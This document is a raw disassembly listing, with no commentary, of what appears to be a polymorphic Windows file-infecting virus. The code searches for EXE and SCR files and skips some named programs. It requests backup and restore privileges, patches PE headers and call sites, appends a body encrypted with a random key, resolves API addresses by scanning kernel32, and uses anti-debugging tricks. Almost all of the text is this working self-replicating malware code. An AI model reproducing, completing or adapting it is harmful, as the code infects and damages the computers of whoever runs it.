[ebx+80h] call sub_31432404 mov edi, [ebp+1042E4h] push esi call sub_31432404 mov edx, [ebp+1042E4h] mov ecx, [edx+8] add ecx, [edx+0Ch] sub ecx, esi sub ecx, 5 js loc_314330C9 jz loc_314330C9 add esi, [ebp+1042E8h] add esi, [ebp+1042A4h] ; START OF FUNCTION CHUNK FOR sub_3143309A loc_31432F7B: ; CODE XREF: sub_3143309A+29j lodsb cmp al, 0E8h jnz loc_31433026 lea eax, [esi+4] sub eax, [ebp+1042A4h] add eax, [esi] push eax call sub_31432404 cmp dword ptr [ebp+1042E4h], 0 jnz short loc_31432FA9 cmp eax, [edi+0Ch] jnb loc_314330C2 jmp short loc_31432FB5 ; --------------------------------------------------------------------------- loc_31432FA9: ; CODE XREF: sub_3143309A-FEj cmp [ebp+1042E4h], edx jnz loc_314330C2 loc_31432FB5: ; CODE XREF: sub_3143309A-F3j add eax, [ebp+1042A4h] cmp word ptr [eax], 25FFh jnz loc_314330C2 mov eax, [eax+2] sub eax, [ebx+34h] push eax call sub_31432404 cmp [ebp+1042E4h], edi jnz loc_314330C2 add eax, [ebp+1042E8h] add eax, [ebp+1042A4h] mov eax, [eax] sub eax, [edi+0Ch] jb loc_314330C2 cmp eax, [edi+8] jnb loc_314330C2 loc_31432FFE: ; CODE XREF: sub_3143309A+22j add eax, 2 add eax, [edi+14h] add eax, [ebp+1042A4h] push edx push eax push dword ptr [ebp+104304h] call dword ptr [ebp+103E5Eh] pop edx test eax, eax jnz loc_314330D8 jmp loc_314330C2 ; --------------------------------------------------------------------------- loc_31433026: ; CODE XREF: sub_3143309A-11Cj cmp al, 0FFh jnz loc_314330C2 cmp byte ptr [esi], 15h jnz loc_314330C2 mov eax, [esi+1] sub eax, [ebx+34h] push eax call sub_31432404 cmp [ebp+1042E4h], edi jnz short loc_314330C2 add eax, [ebp+1042E8h] add eax, [ebp+1042A4h] mov [ebp+104310h], eax mov eax, [eax] cmp eax, [ebp+104308h] jb short loc_3143306F cmp eax, [ebp+10430Ch] jb short loc_314330D8 loc_3143306F: ; CODE XREF: sub_3143309A-35j cmp eax, 70000000h jb short loc_314330AD call sub_3143309A lea ecx, [esi-4] mov eax, ecx sub eax, [edx] add eax, [edx+10h] cmp eax, [ebp+104310h] jnz short locret_31433099 add esp, 10h push dword ptr [ecx] pop [esp-0Ch+arg_24] popa jmp short loc_314330B4 ; --------------------------------------------------------------------------- locret_31433099: ; CODE XREF: sub_3143309A-Fj retn ; END OF FUNCTION CHUNK FOR sub_3143309A ; =============== S U B R O U T I N E ======================================= sub_3143309A proc near ; CODE XREF: sub_3143309A-24p var_8 = dword ptr -8 arg_0 = dword ptr 4 arg_24 = dword ptr 28h ; FUNCTION CHUNK AT 31432F7B SIZE 0000011F BYTES pop dword ptr [ebp+1042C4h] pusha mov esi, [ebp+1042A4h] call sub_3143250B popa loc_314330AD: ; CODE XREF: sub_3143309A-26j test eax, 80000000h jnz short loc_314330C2 loc_314330B4: ; CODE XREF: sub_3143309A-3j sub eax, [edi+0Ch] jb short loc_314330C2 cmp eax, [edi+8] jb loc_31432FFE loc_314330C2: ; CODE XREF: sub_3143309A-F9j ; sub_3143309A-EBj ... dec ecx jnz loc_31432F7B loc_314330C9: ; CODE XREF: sub_31432EE1+9j ; UPX2:31432F63j ... mov edi, [esp-4+arg_0] and dword ptr [edi+29B0h], 0FFBFFFFFh jmp short loc_3143311A ; --------------------------------------------------------------------------- loc_314330D8: ; CODE XREF: sub_3143309A-7Fj ; sub_3143309A-2Dj or dword ptr [edx+24h], 0E0000060h dec esi xor eax, eax mov ecx, [esp+8+var_8] xchg eax, [ebp+1042F0h] mov [ebp+1042ECh], eax lea edi, [ecx+29B4h] add eax, [ebp+1042A4h] movsw movsd dec esi sub eax, esi add eax, [edx+14h] sub eax, [edx+0Ch] mov byte ptr [esi-5], 0E8h mov dword ptr [ecx+54h], 5 mov [esi-4], eax loc_3143311A: ; CODE XREF: sub_3143309A+3Cj pop edi pop esi retn sub_3143309A endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_3143311D proc near ; CODE XREF: UPX2:3143341Ep ; FUNCTION CHUNK AT 31433247 SIZE 00000002 BYTES push edi call dword ptr [ebp+103EAAh] shr eax, 1Fh jnz loc_31433247 push eax push esp push 28h push 0FFFFFFFFh call dword ptr [ebp+103F0Ah] test eax, eax pop edi js loc_31433247 call sub_3143159F call near ptr loc_31433158+5 push ebx db 65h jz short near ptr unk_31433196 imul ebp, [ebp+53h], 72756365h loc_31433158: ; CODE XREF: sub_3143311D+2Ap imul esi, [ecx+edi*2+41h], 78B5FF00h sub_3143311D endp ; sp-analysis failed inc edx adc [eax], al call dword ptr [ebp+103E5Eh] mov [ebp+104280h], eax call near ptr loc_3143318C+1 push ebx db 65h push esp popa imul esp, [ebp+4Fh], 77h outsb db 65h jb short loc_314331F3 push 72507069h imul esi, [esi+69h], 6567656Ch loc_3143318C: ; CODE XREF: UPX2:3143316Fp add [edi-18h], dl sub eax, ebp ; --------------------------------------------------------------------------- db 0FFh db 0FFh db 0E8h ; db 13h db 0 unk_31433196 db 0 ; CODE XREF: sub_3143311D+30j db 0 db 53h ; S db 65h ; e db 52h ; R db 65h ; e db 73h ; s db 74h ; t db 6Fh ; o db 72h ; r db 65h ; e db 50h ; P db 72h ; r db 69h ; i db 76h ; v db 69h ; i db 6Ch ; l db 65h ; e db 67h ; g db 65h ; e db 0 db 57h ; W db 0E8h ; db 0Bh db 0E8h ; db 0FFh db 0FFh db 0E8h ; db 12h db 0 db 0 db 0 db 53h ; S db 65h ; e db 42h ; B db 61h ; a db 63h ; c db 6Bh ; k db 75h ; u db 70h ; p db 50h ; P db 72h ; r db 69h ; i db 76h ; v db 69h ; i db 6Ch ; l db 65h ; e db 67h ; g db 65h ; e db 0 db 57h ; W db 0E8h ; db 0EEh ; db 0E7h ; db 0FFh db 0FFh db 0E8h ; db 18h db 0 db 0 db 0 db 53h ; S db 65h ; e db 43h ; C db 68h ; h db 61h ; a db 6Eh ; n db 67h ; g db 65h ; e db 4Eh ; N db 6Fh ; o db 74h ; t db 69h ; i db 66h ; f db 79h ; y db 50h ; P db 72h ; r db 69h ; i db 76h ; v db 69h ; i db 6Ch ; l db 65h ; e db 67h ; g db 65h ; e db 0 db 57h ; W db 0E8h ; db 0CBh ; db 0E7h ; db 0FFh db 0FFh db 50h ; P db 54h ; T ; --------------------------------------------------------------------------- loc_314331F3: ; CODE XREF: UPX2:3143317Dj lea eax, [ebp+103DBCh] push 64h push eax push 1 push edi call dword ptr [ebp+103F16h] mov [esp], edi call dword ptr [ebp+103E52h] sub al, al lea edi, [ebp+104174h] push eax push eax push eax push dword ptr [ebp+103DBCh] push 40001h push esp push 1 push edi call dword ptr [ebp+104280h] push esp push 4 push edi call dword ptr [ebp+104280h] add esp, 14h push dword ptr [ebp+104278h] call dword ptr [ebp+103E8Eh] ; START OF FUNCTION CHUNK FOR sub_3143311D loc_31433247: ; CODE XREF: sub_3143311D+Aj ; sub_3143311D+1Fj pop edi retn ; END OF FUNCTION CHUNK FOR sub_3143311D ; =============== S U B R O U T I N E ======================================= sub_31433249 proc near ; CODE XREF: UPX2:31433417p ; UPX2:31433423p ... lea esi, [ebp+104174h] push esi call dword ptr [ebp+103E92h] cmp eax, 0FFFFFFFFh jz locret_3143331A mov [ebp+104284h], eax push 0 push esi call dword ptr [ebp+103ECEh] test eax, eax jz locret_3143331A sub eax, eax push eax push eax push 3 push eax push 1 push 0C0000000h push esi call dword ptr [ebp+103E6Eh] cmp eax, 0FFFFFFFFh jz loc_3143389B mov [ebp+104288h], eax lea ecx, [ebp+10428Ch] lea edx, [ebp+104294h] push ecx push edx push 0 push eax call dword ptr [ebp+103E9Ah] cmp eax, 0FFFFFFFFh jz loc_3143388F push 0 push dword ptr [ebp+104288h] call dword ptr [ebp+103E96h] cmp eax, 0FFFFFFFFh jz loc_3143388F mov [ebp+10429Ch], eax xor ecx, ecx add eax, ebx push ecx push eax push ecx push 4 push ecx push dword ptr [ebp+104288h] call dword ptr [ebp+103E72h] test eax, eax jz loc_3143388F xor ecx, ecx mov [ebp+1042A0h], eax push ecx push ecx push ecx push 0F001Fh push eax call dword ptr [ebp+103EBAh] test eax, eax jz loc_31433867 mov [ebp+1042A4h], eax locret_3143331A: ; CODE XREF: sub_31433249+10j ; sub_31433249+27j ... retn sub_31433249 endp ; --------------------------------------------------------------------------- loc_3143331B: ; CODE XREF: sub_3143344B+188p ; sub_3143344B+2A0p mov eax, 7317h mov ecx, [ebx+38h] ; --------------------------------------------------------------------------- db 0F7h ; db 85h ; db 0B0h ; db 39h ; 9 db 10h db 0 db 0 db 0 db 0 ; --------------------------------------------------------------------------- and [ebp+6], dh add eax, [ebp+101069h] xor edx, edx add eax, ecx div ecx mul ecx mov [ebp+1042B0h], eax mov eax, 29BBh mov ecx, [ebx+3Ch] add eax, [ebp+101069h] xor edx, edx add eax, ecx div ecx mul ecx mov [ebp+1042A8h], eax retn ; =============== S U B R O U T I N E ======================================= sub_31433360 proc near ; CODE XREF: sub_3143344B:loc_314334C0p ; sub_3143344B+1B4p movzx ecx, word ptr [ebx+6] stc loc_31433365: ; CODE XREF: sub_31433360+23j jecxz short locret_3143339C lea edx, [ebx+18h] movzx eax, word ptr [ebx+14h] add edx, eax dec ecx imul eax, ecx, 28h add edx, eax cmp dword ptr [edx], 6E69775Fh stc jz short locret_3143339C cmp dword ptr [edx+0Ch], 1 jb short loc_31433365 mov ecx, [ebx+3Ch] mov eax, [edx+14h] add eax, [edx+10h] lea eax, [eax+ecx*2-1] neg ecx and eax, ecx cmp eax, [ebp+10429Ch] locret_3143339C: ; CODE XREF: sub_31433360:loc_31433365j ; sub_31433360+1Dj ... retn sub_31433360 endp ; =============== S U B R O U T I N E ======================================= sub_3143339D proc near ; CODE XREF: UPX2:31433435p arg_C = dword ptr 10h mov edx, [esp+arg_C] xor eax, eax pop dword ptr [edx+0B8h] retn sub_3143339D endp ; sp-analysis failed ; --------------------------------------------------------------------------- loc_314333AA: ; CODE XREF: UPX2:314333CBj mov ecx, edi jmp short loc_314333B9 ; --------------------------------------------------------------------------- lea edi, [ebp+104174h] cld loc_314333B5: ; CODE XREF: UPX2:314333C7j mov ebx, edi xor ecx, ecx loc_314333B9: ; CODE XREF: UPX2:314333ACj ; UPX2:314333CFj lodsb cmp al, 61h jb short loc_314333C4 cmp al, 7Ah ja short loc_314333C4 sub al, 20h loc_314333C4: ; CODE XREF: UPX2:314333BCj ; UPX2:314333C0j stosb cmp al, 5Ch jz short loc_314333B5 cmp al, 2Eh jz short loc_314333AA cmp al, 0 jnz short loc_314333B9 jecxz short locret_3143339C mov eax, [ecx] cmp eax, 455845h jz short loc_314333E7 cmp eax, 524353h jnz locret_3143331A loc_314333E7: ; CODE XREF: UPX2:314333DAj mov eax, [ebx] cmp eax, 434E4957h jz locret_3143331A cmp eax, 4E554357h jz locret_3143331A cmp eax, 32334357h jz locret_3143331A cmp eax, 4F545350h jz locret_3143331A xor ebx, ebx call sub_31433249 jnz short loc_3143342E call sub_3143311D call sub_31433249 jz locret_3143331A loc_3143342E: ; CODE XREF: UPX2:3143341Cj xor edx, edx call sub_3143344B call sub_3143339D call $+5 pop ebp sub ebp, 10343Fh jmp loc_31433845 ; =============== S U B R O U T I N E ======================================= sub_3143344B proc near ; CODE XREF: UPX2:31433430p var_14 = dword ptr -14h push dword ptr fs:[edx] mov esi, [ebp+1042A4h] mov fs:[edx], esp cmp word ptr [esi], 5A4Dh jnz loc_31433845 mov ebx, [esi+3Ch] add ebx, esi cmp word ptr [ebx], 4550h jnz loc_31433845 test dword ptr [ebx+16h], 2000h jnz loc_31433845 test byte ptr [ebx+5Ch], 2 jz loc_31433845 mov eax, [ebx+8] cmp eax, 0A0A0A0A0h jz loc_31433845 cmp eax, 20202020h jz loc_31433845 mov ecx, [ebx+0C8h] jecxz short loc_314334C0 push ecx call sub_31432404 add ecx, [ebp+1042E8h] add ecx, esi and dword ptr [ecx+40h], 0 and dword ptr [ecx+44h], 0 loc_314334C0: ; CODE XREF: sub_3143344B+5Dj call sub_31433360 jb loc_31433845 and dword ptr [ebp+1042ECh], 0 mov eax, [edx+8] mov ecx, [edx+10h] sub eax, ecx jnb short loc_314334E0 xor eax, eax jmp short loc_314334E5 ; --------------------------------------------------------------------------- loc_314334E0: ; CODE XREF: sub_3143344B+8Fj add ecx, eax mov [edx+10h], ecx loc_314334E5: ; CODE XREF: sub_3143344B+93j mov [ebp+1042ACh], eax add ecx, [edx+0Ch] mov eax, 10000h push ecx call near ptr dword_31431B40+43h xor [ebp+1039AEh], dl mov cl, 20h xor [ebp+1039AFh], dh loc_31433507: ; CODE XREF: sub_3143344B+D5j push 20h dec cl pop eax js short loc_31433522 call near ptr dword_31431B40+43h test edx, edx setz dl shl edx, cl xor [ebp+1039B0h], edx jmp short loc_31433507 ; --------------------------------------------------------------------------- loc_31433522: ; CODE XREF: sub_3143344B+C1j test dword ptr [ebp+1039B0h], 2000000h jz short loc_31433550 test dword ptr [ebp+1039B0h], 3 jnz short loc_31433546 and dword ptr [ebp+1039B0h], 0F7FFFFFFh jmp short loc_31433550 ; --------------------------------------------------------------------------- loc_31433546: ; CODE XREF: sub_3143344B+EDj or dword ptr [ebp+1039B0h], 10000000h loc_31433550: ; CODE XREF: sub_3143344B+E1j ; sub_3143344B+F9j ... push 6 pop ecx loc_31433556: ; CODE XREF: sub_3143344B+129j push 6 pop eax call near ptr dword_31431B40+43h mov al, [ebp+1039A8h] xchg al, [edx+ebp+1039A8h] mov [ebp+1039A8h], al loop loc_31433556 test dword ptr [ebp+1039B0h], 8 jnz short loc_3143358B cmp byte ptr [ebp+1039AAh], 1 jz short loc_31433550 loc_3143358B: ; CODE XREF: sub_3143344B+135j test dword ptr [ebp+1039B0h], 10000000h jz short loc_314335B2 cmp byte ptr [ebp+1039A8h], 5 jz short loc_31433550 cmp byte ptr [ebp+1039A9h], 5 jz short loc_31433550 cmp byte ptr [ebp+1039AAh], 5 jz short loc_31433550 loc_314335B2: ; CODE XREF: sub_3143344B+14Aj test dword ptr [ebp+1039B0h], 400000h jz short loc_314335C7 cmp byte ptr [ebp+1039A8h], 2 ja short loc_31433550 loc_314335C7: ; CODE XREF: sub_3143344B+171j and dword ptr [ebp+1042F0h], 0 call loc_31432845 call loc_3143331B call sub_3143384E mov ebx, [ebp+1042A8h] add ebx, [ebp+1042ACh] call sub_31433249 jz loc_31433845 mov esi, [ebp+1042A4h] mov ebx, [esi+3Ch] add ebx, esi call sub_31433360 jb loc_31433845 or dword ptr [edx+24h], 0E0000060h mov edi, esi push edx push esi add edi, [edx+14h] add edi, [edx+10h] test dword ptr [ebp+1039B0h], 20000000h jnz short loc_3143363B mov [ebp+1042F4h], edi lea esi, [ebp+1039BCh] mov ecx, [ebp+101069h] rep movsb loc_3143363B: ; CODE XREF: sub_3143344B+1DAj push edi mov ecx, 0A6Fh lea esi, [ebp+101000h] rep movsd mov cl, 0 jecxz short loc_3143364F rep movsb loc_3143364F: ; CODE XREF: sub_3143344B+200j test dword ptr [ebp+1039B0h], 20000000h jz loc_3143370D push dword ptr [ebx+28h] call sub_31432404 mov edx, [ebp+1042E4h] test edx, edx jz loc_3143370D mov esi, [ebp+1042A4h] mov ecx, [edx+10h] or dword ptr [edx+24h], 0E0000060h sub ecx, [edx+8] jnb short loc_3143368C xor ecx, ecx loc_3143368C: ; CODE XREF: sub_3143344B+23Dj add esi, [edx+14h] cmp ecx, [ebp+101069h] mov ecx, [ebp+101069h] jb short loc_314336F3 mov edi, [esp+14h+var_14] and dword ptr [ebp+101069h], 0 and dword ptr [edi+69h], 0 mov edi, [edx+8] add [edx+8], ecx add esi, edi xchg esi, edi mov eax, [ebp+1042B8h] test dword ptr [ebp+1039B0h], 40h jz short loc_314336CC neg dword ptr [eax] loc_314336CC: ; CODE XREF: sub_3143344B+27Dj add esi, [edx+0Ch] sub [eax], esi mov [ebp+1042F0h], esi mov esi, [ebx+28h] add [eax], esi test dword ptr [ebp+1039B0h], 40h jz short loc_314336EA neg dword ptr [eax] loc_314336EA: ; CODE XREF: sub_3143344B+29Bj push ecx call loc_3143331B pop ecx jmp short loc_314336FF ; --------------------------------------------------------------------------- loc_314336F3: ; CODE XREF: sub_3143344B+250j add esi, [ebx+28h] sub esi, [edx+0Ch] push ecx push esi rep movsb pop edi pop ecx loc_314336FF: ; CODE XREF: sub_3143344B+2A6j lea esi, [ebp+1039BCh] mov [ebp+1042F4h], edi rep movsb loc_3143370D: ; CODE XREF: sub_3143344B+20Ej ; sub_3143344B+224j pop edi pop esi rdtsc xchg eax, edx lea eax, [edi+137h] cmp dl, [ebp+1039AEh] jnz short loc_31433726 imul edx, 12345678h loc_31433726: ; CODE XREF: sub_3143344B+2D3j mov [eax-19h], dx call near ptr locret_3143111E+2 pop edx mov ecx, [edx+0Ch] add ecx, [edx+10h] test dword ptr [ebp+1039B0h], 20000000h lea eax, [ecx+5] jnz short loc_31433758 mov [ebp+1042F0h], ecx add eax, [ebp+101069h] and dword ptr [edi+69h], 0 loc_31433758: ; CODE XREF: sub_3143344B+2F8j sub eax, [ebx+28h] mov [edi+54h], eax test dword ptr [ebp+103F6Ch], 1 jz short loc_31433774 mov dword ptr [ebx+8], 0A0A0A0A0h loc_31433774: ; CODE XREF: sub_3143344B+320j test dword ptr [ebp+1039B0h], 400000h jz short loc_31433787 push edx call sub_31432EE1 pop edx loc_31433787: ; CODE XREF: sub_3143344B+333j mov ecx, [ebp+1042F0h] jecxz short loc_31433794 mov [ebx+28h], ecx jmp short loc_314337A1 ; --------------------------------------------------------------------------- loc_31433794: ; CODE XREF: sub_3143344B+342j mov ecx, [ebp+1042ECh] jecxz short loc_3143379E jmp short loc_314337A1 ; --------------------------------------------------------------------------- loc_3143379E: ; CODE XREF: sub_3143344B+34Fj mov ecx, [ebx+28h] loc_314337A1: ; CODE XREF: sub_3143344B+347j ; sub_3143344B+351j test dword ptr [ebp+1039B0h], 3 jz short loc_314337C1 mov eax, [ebp+1042F4h] add ecx, [ebp+1042DCh] add eax, [ebp+1042D8h] add [eax], ecx loc_314337C1: ; CODE XREF: sub_3143344B+360j mov ecx, [edx+10h] mov eax, [ebp+1042A8h] cmp [edx+8], ecx jnb short loc_314337D2 mov [edx+8], ecx loc_314337D2: ; CODE XREF: sub_3143344B+382j add [edx+10h], eax and dword ptr [ebx+58h], 0 mov eax, [ebp+1042B0h] push 29BCh add [edx+8], eax pop ecx add [ebx+50h], eax mov dl, [ebp+1039AEh] test dword ptr [ebp+1039B0h], 20000000h jz short loc_31433803 add ecx, [ebp+101069h] loc_31433803: ; CODE XREF: sub_3143344B+3B0j mov dh, 0 test dword ptr [ebp+1039B0h], 20000h jnz short loc_31433825 inc dh test dword ptr [ebp+1039B0h], 40000h jnz short loc_31433825 mov dh, [ebp+1039AFh] loc_31433825: ; CODE XREF: sub_3143344B+3C4j ; sub_3143344B+3D2j test dword ptr [ebp+1039B0h], 4000h jnz short loc_3143383C loc_31433831: ; CODE XREF: sub_3143344B+3EDj mov al, [edi] add al, dl stosb add dl, dh loop loc_31433831 jmp short loc_31433845 ; --------------------------------------------------------------------------- loc_3143383C: ; CODE XREF: sub_3143344B+3E4j ; sub_3143344B+3F8j mov al, [edi] xor al, dl stosb add dl, dh loop loc_3143383C loc_31433845: ; CODE XREF: UPX2:31433446j ; sub_3143344B+11j ... xor edx, edx mov esp, fs:[edx] pop dword ptr fs:[edx] pop eax sub_3143344B endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_3143384E proc near ; CODE XREF: sub_3143344B+18Dp cmp dword ptr [ebp+104288h], 0 jz locret_3143331A push dword ptr [ebp+1042A4h] call dword ptr [ebp+103EDEh] loc_31433867: ; CODE XREF: sub_31433249+C5j push dword ptr [ebp+1042A0h] call dword ptr [ebp+103E52h] lea ecx, [ebp+10428Ch] lea edx, [ebp+104294h] push ecx push edx push 0 push dword ptr [ebp+104288h] call dword ptr [ebp+103ED2h] loc_3143388F: ; CODE XREF: sub_31433249+6Bj ; sub_31433249+82j ... push dword ptr [ebp+104288h] call dword ptr [ebp+103E52h] loc_3143389B: ; CODE XREF: sub_31433249+45j lea esi, [ebp+104174h] push dword ptr [ebp+104284h] push esi call dword ptr [ebp+103ECEh] and dword ptr [ebp+104288h], 0 retn sub_3143384E endp ; --------------------------------------------------------------------------- dw 0E8h dd 5D000000h, 0ED81016Ah, 1038BBh, 0C10FF058h, 10157885h dd 0C3C08500h, 0F0FFC883h, 7885C10Fh, 0C3001015h, 2A00103Dh dd 661C7500h, 0C247C81h, 1375716Ch, 0FFC4E860h, 575FFFFh dd 0FFFAB5E8h, 0FFD2E8FFh, 2E61FFFFh, 56782DFFh, 25B81234h dd 60000000h, 0FFFFA5E8h, 8B3975FFh, 8D302444h, 104174B5h dd 8508B00h, 63A8166h, 56257302h, 0FF000068h, 6AC48B00h dd 0FF505200h, 103F1E95h, 8C48300h, 3F5C3E81h, 3755C3Fh dd 0E804C683h, 0FFFFFA62h, 0FFFF7FE8h, 0B8C361FFh, 74h dd 2FB8B1EBh, 0E8000000h, 1Dh, 0B80020C2h, 30h, 10E8h dd 24C200h, 185B8h, 3E800h, 2CC20000h, 24548D00h, 832ECD0Ch dd 197C00F8h, 0E860h, 548B0000h, 8B5D3024h, 92ED811Ah dd 0E8001039h, 0FFFFE0B3h, 4C261h, 7010302h, 17D50506h dd 7ABBC4FBh, 119415FFh, 0FF8B0100h, 1C39068h, 0FFC48BEDh dd 0E85B93D0h, 59h, 824648Bh, 4EBB8h, 64FAEB00h, 18A167h dd 0F30408Bh, 830240B6h, 3C7500F8h, 0E8h, 0ED815D00h, 402334h dd 237B858Bh, 85030040h, 402383h, 858BF08Bh, 40237Fh, 23838503h dd 8B500040h, 0ACC933FEh, 238B8532h, 41AA0040h, 23878D3Bh dd 0EF7C0040h, 64C02BC3h, 896430FFh, 5678B820h, 3871234h dd 6000h, 7BB0h, 31420000h, 1E00h db 78h ; =============== S U B R O U T I N E ======================================= sub_31433A45 proc near ; CODE XREF: UPX2:31433A7Fp pusha push ebp mov ebp, esp call loc_31433A58 call near ptr byte_31433AF3 jmp near ptr byte_31433AAB sub_31433A45 endp ; --------------------------------------------------------------------------- loc_31433A58: ; CODE XREF: sub_31433A45+4p push dword ptr fs:0 mov fs:0, esp xor ebx, ebx push ebx push ebx push ebx push ebx push 80000000h push ebx push ebx push ebx push ebx push ebx push 10h push ebx push 800h call sub_31433A45 xor [ecx], esi fld tbyte ptr [eax+0] add [ecx], al add [eax+0], ch ; --------------------------------------------------------------------------- dw 0 dd 406880h, 680000h, 4 dup(0) db 3 dup(0) byte_31433AAB db 0 ; CODE XREF: sub_31433A45+Ej dd 11h dup(0) db 3 dup(0) byte_31433AF3 db 0 ; CODE XREF: sub_31433A45+9p dd 0D7h dup(0) dd 9B470000h, 8AD7C80h, 3317C83h, 7C91h, 1468h dup(0) ; --------------------------------------------------------------------------- loc_31439000: ; DATA XREF: UPX2:3143C2F8o call $+5 cld mov eax, [esp] mov ecx, [eax+29ABh] mov [eax+32F3h], ebx and ecx, 400000h mov ebx, [esp+4] jz short loc_3143904D pop ecx mov [eax+32F7h], esi mov cl, [eax+29AFh] mov [eax+32FBh], edi cmp cl, 0E8h jz short loc_31439041 mov ebx, [eax+29B1h] jmp short loc_3143904B ; --------------------------------------------------------------------------- loc_31439041: ; CODE XREF: UPX2:31439037j mov ecx, [eax+29B0h] mov ebx, [ecx+ebx+2] loc_3143904B: ; CODE XREF: UPX2:3143903Fj mov ebx, [ebx] loc_3143904D: ; CODE XREF: UPX2:3143901Fj push ebp mov ebp, eax sub dword ptr [esp+4], 10E05h sub ebp, 101005h mov edi, [esp+4] lea esi, [ebp+1039BCh] mov ecx, 0D5h rep movsb sldt cx test ecx, ecx jnz short loc_3143907B or eax, 0FFFFFFFFh int 2Eh ; DOS 2+ internal - EXECUTE COMMAND ; DS:SI -> counted CR-terminated command string loc_3143907B: ; CODE XREF: UPX2:31439074j and ebx, 0FFFFF000h loc_31439081: ; CODE XREF: UPX2:31439090j cmp dword ptr [ebx+4Eh], 73696854h jz short loc_31439092 loc_3143908A: ; CODE XREF: UPX2:3143909Fj sub ebx, 100h jnz short loc_31439081 loc_31439092: ; CODE XREF: UPX2:31439088j mov eax, ebx add eax, [ebx+3Ch] mov edx, [eax+78h] cmp word ptr [eax], 4550h jnz short loc_3143908A add edx, ebx mov esi, [edx+20h] loc_314390A6: ; CODE XREF: UPX2:3143911Ej mov ecx, [edx+18h] add esi, ebx push ecx loc_314390AC: ; CODE XREF: UPX2:loc_314390C0j lodsd add eax, ebx cmp word ptr [eax+2], 5074h jnz short loc_314390C0 cmp dword ptr [eax+5], 6441636Fh jz short loc_314390C5 loc_314390C0: ; CODE XREF: UPX2:314390B5j loop loc_314390AC pop ecx jmp short loc_314390F0 ; --------------------------------------------------------------------------- loc_314390C5: ; CODE XREF: UPX2:314390BEj sub [esp], ecx mov esi, [edx+24h] pop ecx add esi, ebx movzx eax, word ptr [esi+ecx*2] mov edi, [edx+1Ch] add edi, ebx mov esi, [edi+eax*4] add esi, ebx lea eax, [ebp+101137h] lea ecx, [ebp+101120h] mov dx, [eax-19h] call ecx jmp short loc_31439137 ; --------------------------------------------------------------------------- ; START OF FUNCTION CHUNK FOR sub_3143917E loc_314390F0: ; CODE XREF: UPX2:314390C3j ; sub_3143917E+10j ... mov eax, [ebp+1039B0h] and eax, 400000h jz short loc_3143911C lea esi, [ebp+1039B4h] lodsd mov edi, [esp+arg_0] stosd mov ebx, [ebp+1042F8h] movsb mov edi, [ebp+104300h] mov esi, [ebp+1042FCh] loc_3143911C: ; CODE XREF: sub_3143917E-83j pop ebp retn ; END OF FUNCTION CHUNK FOR sub_3143917E ; --------------------------------------------------------------------------- jl short loc_314390A6 ; =============== S U B R O U T I N E ======================================= sub_31439120 proc near ; CODE XREF: sub_3143B44B+2DFp push ebx mov ecx, 2879h mov ebx, edx loc_31439128: ; CODE XREF: sub_31439120+13j xor [eax], dl sub dl, bl add eax, 1 xchg bl, bh xchg dl, dh loop loc_31439128 pop ebx retn sub_31439120 endp ; --------------------------------------------------------------------------- loc_31439137: ; CODE XREF: UPX2:314390EEj call near ptr loc_31439146+2 inc ebx insb outsd jnb short near ptr loc_314391A3+3 dec eax popa outsb db 64h insb loc_31439146: ; CODE XREF: UPX2:loc_31439137p add gs:[ebx-1], dl setalc mov [ebp+103E52h], eax call near ptr loc_31439162+1 inc ebx jb short loc_314391BE popa jz short near ptr loc_314391C0+1 inc ebp jbe short near ptr loc_314391C0+4 outsb jz short loc_314391A3 loc_31439162: ; CODE XREF: UPX2:31439151p add [ebx-1], dl setalc mov [ebp+103E56h], eax call sub_3143917E inc edi db 65h jz short near ptr loc_314391C0+1 popa jnb short near ptr loc_314391EA+2 inc ebp jb short near ptr loc_314391EA+3 outsd jb short $+2 ; =============== S U B R O U T I N E ======================================= sub_3143917E proc near ; CODE XREF: UPX2:3143916Cp arg_0 = dword ptr 4 ; FUNCTION CHUNK AT 314390F0 SIZE 0000002E BYTES ; FUNCTION CHUNK AT 31439524 SIZE 0000000B BYTES push ebx call esi ; lstrcatA mov [ebp+103E5Ah], eax call sub_3143954F test eax, eax jz loc_314390F0 push eax call dword ptr [ebp+103E5Ah] test eax, eax jnz loc_31439524 loc_314391A3: ; CODE XREF: UPX2:31439160j ; UPX2:3143913Fj cmp byte ptr [ebp+10152Fh], 1 jnz short loc_314391C0 push dword ptr [ebp+1042F8h] dec byte ptr [ebp+10152Fh] pop dword ptr [ebp+101588h] loc_314391BE: ; CODE XREF: UPX2:31439157j jmp short loc_314391C7 ; --------------------------------------------------------------------------- loc_314391C0: ; CODE XREF: sub_3143917E+2Cj ; UPX2:3143915Aj ... and dword ptr [ebp+101588h], 0 loc_314391C7: ; CODE XREF: sub_3143917E:loc_314391BEj and dword ptr [ebp+101578h], 0 and dword ptr [ebp+10157Ch], 0 and dword ptr [ebp+101580h], 0 push edi mov byte ptr [ebp+1012D4h], 1 mov [ebp+103E5Eh], esi loc_314391EA: ; CODE XREF: UPX2:31439176j ; UPX2:31439179j lea esi, [ebp+1015F4h] xor ecx, ecx lea edi, [ebp+103E6Ah] mov cl, 20h call sub_3143958C pop edi call dword ptr [ebp+103EAAh] shr eax, 1Fh jz loc_314392E3 mov eax, [edi+14h] push 40h add eax, ebx push 8001000h mov [ebp+103E62h], eax push 7318h push 0 call dword ptr [ebp+103EE2h] test eax, eax jz loc_31439524 xchg eax, edi lea esi, [ebp+101000h] mov ebp, edi mov ecx, 0CC6h sub ebp, 101000h lea edx, [ebp+101254h] rep movsd jmp edx ; --------------------------------------------------------------------------- sub esp, 20h mov edi, esp push 8 xor eax, eax pop ecx lea edx, [ebp+101B3Dh] rep stosd mov edi, esp mov [edi+10h], edx inc byte ptr [edi+1Ch] push edi push 10003h call dword ptr [ebp+103E62h] add esp, 20h test eax, eax jz loc_31439524 xchg eax, edi push 0 push 1 push 80000400h push 10000h call dword ptr [ebp+103E62h] test eax, eax jz loc_31439524 push 0 push eax push 40000h push 0 shr eax, 0Ch push edi push 1 push eax push 10001h call dword ptr [ebp+103E62h] push 1000Ah call dword ptr [ebp+103E62h] call loc_314392D3 jmp loc_31439524 ; --------------------------------------------------------------------------- loc_314392D3: ; CODE XREF: sub_3143917E+14Bp ; sub_3143917E+162j push 0 pop ecx jecxz short locret_314392E2 push 0Ah call dword ptr [ebp+103ED6h] jmp short loc_314392D3 ; --------------------------------------------------------------------------- locret_314392E2: ; CODE XREF: sub_3143917E+158j retn ; --------------------------------------------------------------------------- loc_314392E3: ; CODE XREF: sub_3143917E+8Bj cmp 